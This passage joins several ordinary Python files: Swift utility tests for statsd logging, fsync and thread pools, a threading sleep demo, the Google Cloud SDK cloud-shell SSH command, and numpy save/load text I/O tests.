self.assertEqual(None, logger.decrement('foo', 0.57))
self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
self.assertEqual(None, logger.timing('foo', 88.048))
self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
self.assertEqual(None, logger.timing_since('foo', 8938))
self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
self.assertEqual(None, logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEquals('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
def test_thread_locals(self):
logger = utils.get_logger(None)
orig_thread_locals = logger.thread_locals
try:
self.assertEquals(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEquals(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEquals(logger.thread_locals, ('5678', '5.6.7.8'))
finally:
logger.thread_locals = orig_thread_locals
def test_no_fdatasync(self):
called = []
class NoFdatasync:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync:
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEquals(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEquals(called, [12345])
class TestThreadpool(unittest.TestCase):
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_run_in_thread_without_threads(self):
# with zero threads, run_in_thread doesn't actually do so
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
if __name__ == '__main__':
unittest.main()
|
mt_sleep2.py | # Copyright (c) 2014 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import threading
from time import sleep, ctime
LOOPS = [4, 2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
apply(self.func, self.args)
def Loop(nloop, nsec):
print 'start Loop', nloop, 'at:', ctime()
sleep(nsec)
print 'Loop', nloop, 'DONE at:', ctime()
def Main():
print 'starting at:', ctime()
threads = []
nloops = range(len(LOOPS))
for i in nloops:
t = threading.Thread(target=ThreadFunc(Loop, (i, LOOPS[i]),
Loop.__name__))
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print 'all DONE at:', ctime()
if __name__ == '__main__':
Main()
|
ssh.py | # -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""cloud-shell ssh command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import threading
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.cloud_shell import util
from googlecloudsdk.command_lib.util.ssh import ssh
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class SshAlpha(base.Command):
"""Allows you to establish an interactive SSH session with Cloud Shell."""
detailed_help = {
'DESCRIPTION':
"""\
*{command}* lets you remotely log in to Cloud Shell. If your Cloud Shell
is not currently running, this will cause it to be started before
establishing the SSH session.
""",
'EXAMPLES':
"""\
To SSH into your Cloud Shell, run:
$ {command}
To run a remote command in your Cloud Shell, run:
$ {command} --command=ls
""",
}
@staticmethod
def Args(parser):
util.ParseCommonArgs(parser)
parser.add_argument(
'--command',
help="""\
A command to run in Cloud Shell.
Runs the command in Cloud Shell and then exits.
""")
parser.add_argument(
'--dry-run',
help="""\
If provided, prints the command that would be run to standard out
instead of executing it.
""",
action='store_true')
parser.add_argument(
'--ssh-flag',
help='Additional flags to be passed to *ssh(1)*.',
action='append')
def Run(self, args):
command_list = args.command.split(' ') if args.command else ['bash -l']
project = properties.VALUES.core.project.Get()
connection_info = util.PrepareEnvironment(args)
command = ssh.SSHCommand(
remote=ssh.Remote(host=connection_info.host, user=connection_info.user),
port=str(connection_info.port),
identity_file=connection_info.key,
remote_command=(['DEVSHELL_PROJECT_ID=' + project]
if project else []) + command_list,
extra_flags=args.ssh_flag,
tty=not args.command,
options={'StrictHostKeyChecking': 'no'},
)
if args.dry_run:
log.Print(' '.join(command.Build(connection_info.ssh_env)))
else:
self.done = threading.Event()
thread = threading.Thread(target=self.Reauthorize, args=())
thread.daemon = True
thread.start()
command.Run(connection_info.ssh_env)
self.done.set()
def Reauthorize(self):
while not self.done.is_set():
self.done.wait(30 * 60) # Push every 30 minutes
util.AuthorizeEnvironment()
|
test_io.py | import sys
import gzip
import os
import threading
from tempfile import mkstemp, NamedTemporaryFile
import time
from datetime import datetime
import warnings
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_
if sys.version_info[0] >= 3:
from io import BytesIO
def StringIO(s=""):
return BytesIO(asbytes(s))
else:
from StringIO import StringIO
BytesIO = StringIO
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = StringIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = StringIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError, err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in xrange(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = StringIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
asbytes_nested(
[(fmt + ' ' + fmt + '\n') % (1, 2),
(fmt + ' ' + fmt + '\n') % (3, 4)]))
a = np.array([[1, 2], [3, 4]], int)
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['1\n', '2\n', '3\n', '4\n']))
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = StringIO()
np.savetxt(c, a, delimiter=asbytes(','), fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1,2\n', '3,4\n']))
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = StringIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['01 2.0\n', '03 4.0\n']))
# A single multiformat string
c = StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))
# Specify delimiter, should be overiden
c = StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = StringIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer +'\n1 2\n3 4\n' ))
# Test the footer keyword argument
c = StringIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = StringIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d', header=test_header_footer,
comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = StringIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d', footer=test_header_footer,
comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = StringIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested([
' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n']))
# One format for each real and imaginary part
c = StringIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested([
' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n']))
# One format for each complex number
c = StringIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested([
'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n']))
class TestLoadTxt(TestCase):
def test_record(self):
c = StringIO()
c.write(asbytes('1 2\n3 4'))
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = StringIO()
d.write(asbytes('M 64.0 75.0\nF 25.0 60.0'))
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = StringIO()
c.write(asbytes('1 2\n3 4'))
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = StringIO()
c.write(asbytes('1\n2\n3\n4\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = StringIO()
c.write(asbytes('1,2,3,4\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = StringIO()
c.write(asbytes('1,2,3,,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = StringIO()
c.write(asbytes('1,2,3,,5\n6,7,8,9,10\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = StringIO()
c.write(asbytes('# comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = StringIO()
c.write(asbytes('comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = StringIO()
c.write(asbytes('# comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = StringIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(arr['stid'], asbytes_nested(["JOE", "BOB"]))
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = StringIO()
c.write(asbytes('1,2,3.0\n4,5,6.0\n'))
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[[1, 2, 3], [4, 5, 6]],[[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
warnings.filterwarnings("ignore", message="loadtxt: Empty input file:")
c = StringIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = StringIO()
c.writelines([asbytes('1 21\n'), asbytes('3 42\n')])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = asbytes(""" 1; 2001-01-01
2; 2002-01-31 """)
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = StringIO()
c.write(asbytes("%s %s" % tgt))
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = StringIO()
c.write(asbytes("%s %s" % tgt))
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, asbytes('1 21\r3 42\r'))
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = StringIO()
c.write(asbytes('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t'))
c.seek(0)
dt = { 'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([asbytes('start '), asbytes(' '), asbytes('')])
